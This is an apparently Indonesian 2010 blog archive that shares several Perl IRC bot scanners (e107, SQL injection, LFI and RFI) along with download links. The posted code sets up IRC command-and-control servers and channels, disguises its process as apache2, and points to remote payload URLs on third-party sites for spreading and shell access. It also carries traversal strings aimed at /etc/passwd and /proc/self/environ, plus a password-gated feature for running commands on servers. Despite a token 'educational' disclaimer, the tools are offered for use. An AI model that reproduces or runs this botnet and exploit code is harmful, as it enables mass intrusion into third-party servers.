Showing posts with label LFI Scanner. Show all posts
Showing posts with label LFI Scanner. Show all posts

Thursday, 8 July 2010

e107 New Scanner ByroeNet

#!/usr/bin/perl
$powered="ByroeNet";
$mail="admin(at)byroe.net";
#######################################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k start";
$ircserver = "irc.kill-9.server.or.id";
my $ircport = "6667";
my $nickname = "loveYou";
my $ident = "love";
my $channel = "#kill-9";
my $runner = "arianom";
my $fullname = 'matamu suwek';
my $lfi = "!lfi";
my $xml = "!xml";
my $e107 = "!e107";
my $sql = "!sql";
my $rfi = "!rfi";
my $cmdlfi = "!cmdlfi";
my $cmde107 = "!cmde107";
my $cmdxml = "!cmdxml";
my $rspo_test = "../../../../../../../../../../../../../../../proc/self/environ";
my $rfiid = "http://www.the-huang.idv.tw/e107/e107_themes/lamb/id.txt?";
my $byroesprd = "http://www.the-huang.idv.tw/e107/e107_themes/lamb/pbot.txt?";

Download [lengkap +id]

Saturday, 5 June 2010

BaMbY LFI Scanner

#!/usr/bin/perl
$powered="BaMbY";
$mail="admin(at)bamby.web.id";
#################################################################################
## 28/05/2010
## Author : BaMbY
## Team : Irc.Konthol.Net
## WebSite : http://www.bamby.web.id
## Contact : admin(at)bamby.web.id
##
## ## IMPORTANT ##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !!
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR
## # SYSTEM MORE SECURE.
## ##
##
## Features:
## [+]Sql Injection Scanner
## [+]XML (Extensible Markup Language) Injection Scanner
## [+]Remote File Inclusion Scanner
## [+]Local File Inclusion Scanner
## [+]Integrated Shell, so you can execute commands on the server
## [+]Spread Mode, to activate or disable Spread Function
##
#####################################################################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k homo";
$ircserver = "irc.konthol.net";
my $ircport = "7000";
my $nickname = "Peli";
my $ident = "Ngaceng";
my $channel = "#homo";
my $runner = "BabY";
my $fullname = 'New Scanner Konthol';
my $lfi = "!lfi";
my $xml = "!xml";
my $sql = "!sql";
my $rfi = "!rfi";
my $cmdlfi = "!cmdlfi";
my $cmdxml = "!cmdxml";
my $myste = "http://www.tempat-respon-dan-spreader.com/";


Download [Full+id]

Friday, 4 June 2010

SQL , LFI dan RFI Scanner

#!/usr/bin/perl

############################################
# VopCrew Multi Scanner v5.1 #
# ReCoded by arianom #
# kill.nines[at]gmail[dot]com #
# Copyleft © 2009 VopCrew UnderGrounD #
############################################
# perl vopcrew.txt help me !!! #
############################################

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use Socket;

my $fakeproc = $ARGV[6];
$ircserver = $ARGV[0] unless $ircserver;
my $ircport = $ARGV[1];
my $nickname = $ARGV[2];
my $ident = $ARGV[3];
my $channel = '#'.$ARGV[4];
my $runner = $ARGV[5];
my $fullname = ' 15( 7@ 2VopCrew-Multi-Scanner 15) ';

my $injector = $ARGV[7];
my $phpshell = $ARGV[8];
my $rficmd = '!rfi';
my $lficmd = '!lfi';
my $mysqlcmd = '!mysql';
my $mssqlcmd = '!mssql';
my $alicmd = '!log';

$rfi_result = "v0pCr3w";
$lfi_test = "../../../../../../../../../../../../../../../etc/passwd";
$lfi_output = "root:(.+):(.+):(.+):(.+):(.+):(.+)";
$sql_test = "'";
$mysql_output = ("Query failed|Query Error|right syntax to use near");
$mssql_output = ("SQL Server error|Incorrect syntax near|syntax error converting|unclosed quotation");

my $success = "\n [+] VopCrew Multi Scanner\n [-] Loading Successfully ...\n [-] Process/PID : $fakeproc - $$\n";
my $failed = "\n [-] perl $0 \n\n";

if (@ARGV != 9) { print $failed; exit(); } else { print $success; }

Download [Lengkap +id]


NB: Cara menggunakan > perl vopscan.txt
Nanti akan muncul Cara Penggunaan yang benar pada kolom shell anda

Thursday, 3 June 2010

RFI & LFI scanner

***************************
AUTOR: arianom
DATE :Juli 2009
LINGUAGE: perl (.pl)
**************************

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;

$|++;
#######################################################
## CONFIGURATION //
#######################################################

$auth = "arianom";
$authmail = "arianom\@live.it";

my $id = "http://nuthome.net/xe/idosyris.txt??";
my $shell = "http://www.soraperra.com/canazeiinforma/ssh.txt??";
my $ircd = "irc.gotakan.h4ck.la";
my $port = "6667";
my $chan1 = "#kill-9";
my $chan2 = "#kill-9";
my $nick = "RFI-NO[".int(rand(100))."]"; #Nick

my @admins = ("arianom");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test
in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites.
Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher
number, so more speed.
my $rfipidpr0c = 50;


### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )

my $spread = "http://www.barcamenando.it/red.txt?";
my $spreadACT = 1; #1 ->disabled, 1 ->enabled
my $securityACT = 0; #1 ->disabled, 1 ->enabled
my $killpwd = "nolimit"; #Password to Kill the Bot
my $chidpwd = "nolimit"; #Password to change the RFI Response
my $cmdpwd = "nolimit"; #Password to execute commands on the server
my $secpwd = "nolimit"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "nolimit"; #Passowrd to enable/disable the Spread Mode

Download[lengkap + id]

Wednesday, 2 June 2010

LFi Scanner v1.0

#!/usr/bin/perl

#######################################
# Apache Conf Scanner v1.0 #
# ReCoded by arianom #
# d00r[at]telkom[dot]net #
# Copyleft © 2009 VopCrew UnderGrounD #
#######################################

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use Socket;

my $fakeproc = $ARGV[6];
$ircserver = $ARGV[0] unless $ircserver;
my $ircport = $ARGV[1];
my $nickname = $ARGV[2];
my $ident = $ARGV[3];
my $channel = '#'.$ARGV[4];
my $runner = $ARGV[5];
my $fullname = ' 15( 7@ 2Apache-Conf-Scanner 15) ';

my $lficmd = '!conf';
my $alicmd = '!logz';

my $status = 0;
my $null_byte = "";
my $trasversal = "../../../../../../../../../../../../../../../..";
my $lfi_test = "/etc/passwd";
my $lfi_output = "root:(.+):(.+):(.+):(.+):(.+):(.+)";
my $conf_output = "server configuration file";
my @httpd_conf = qw (
/etc/httpd/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/etc/apache/httpd.conf
/usr/local/etc/httpd/httpd.conf
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/var/www/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
);

Download Link
NB:Cara Menggunakan gampang, ketik aja perl conf-scan.txt
nanti muncul pesan cara menggunakan yang benar di Kolom Shell
Selamat Mencoba!!